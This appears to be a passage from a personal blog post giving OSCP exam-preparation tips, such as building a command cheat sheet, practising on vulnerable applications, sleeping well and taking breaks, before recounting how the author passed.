Prepare exploits and a list of go-to commands prior to the test – Yes, you'll have you course materials at your disposal during the exam, but you will not want to flip through pages or take the time to watch videos during the exam. Trust me its the shortest 24hours of your life. I created a spreadsheet which I'll refine and post for download, that I call my Warchess. It contains the step by step stack-based buffer overflow exploitation process as Taught in the Offsec training; I was able to use this to make sure I hadn't missed any necessary steps, Common commands, Shell escape sequences, Netcat, Python, Perl, bind and reverse shell syntax, and a list of my per-compiled Linux and Windows remote and local exploits.

Get plenty of rest – This was partially the culprit during my second attempt. My anticipation for the exam would not allow me to sleep well the night before. I got 3 hours of sleep in total. Ultimately I knew how to achieve success, but did not have the energy and mental fortitude.

Download and Practice vulnerable applications to exploit – The exploit-db has several exploits publicized Remote Buffer Overflow exploits which have down loadable links to the vulnerable applications for your own P.O.Cs. Do this, master these exploits and all the curveballs prior to potentially seeing them during the exam.

Take frequent breaks – I know this is on allot of posts, however, do not ignore this. Sitting in one place and concentrating on the exam can be extremely stressful on the body. Make sure you stretch and keep the blood circulating. Also, you mind will benefit from switching gears.

So in summary, I made a couple fatal mistakes.
Not following through with known exploits from the training
Not getting enough sleep the night before the examination
Not adequately preparing for the unknown

Ultimately, after overcoming my issues, I was able to complete the exam in about 8 hours. I used a bit of the remaining time to put finishing touches on my lab/exam report. The good folks at Offensive Security sent me a Congratulations email on the same day; awarding me with the elusive OSCP certification; by far the best certification accomplishment thus far.

I will continue to hone my craft in preparation for Cracking the Perimeter/OSCE later this year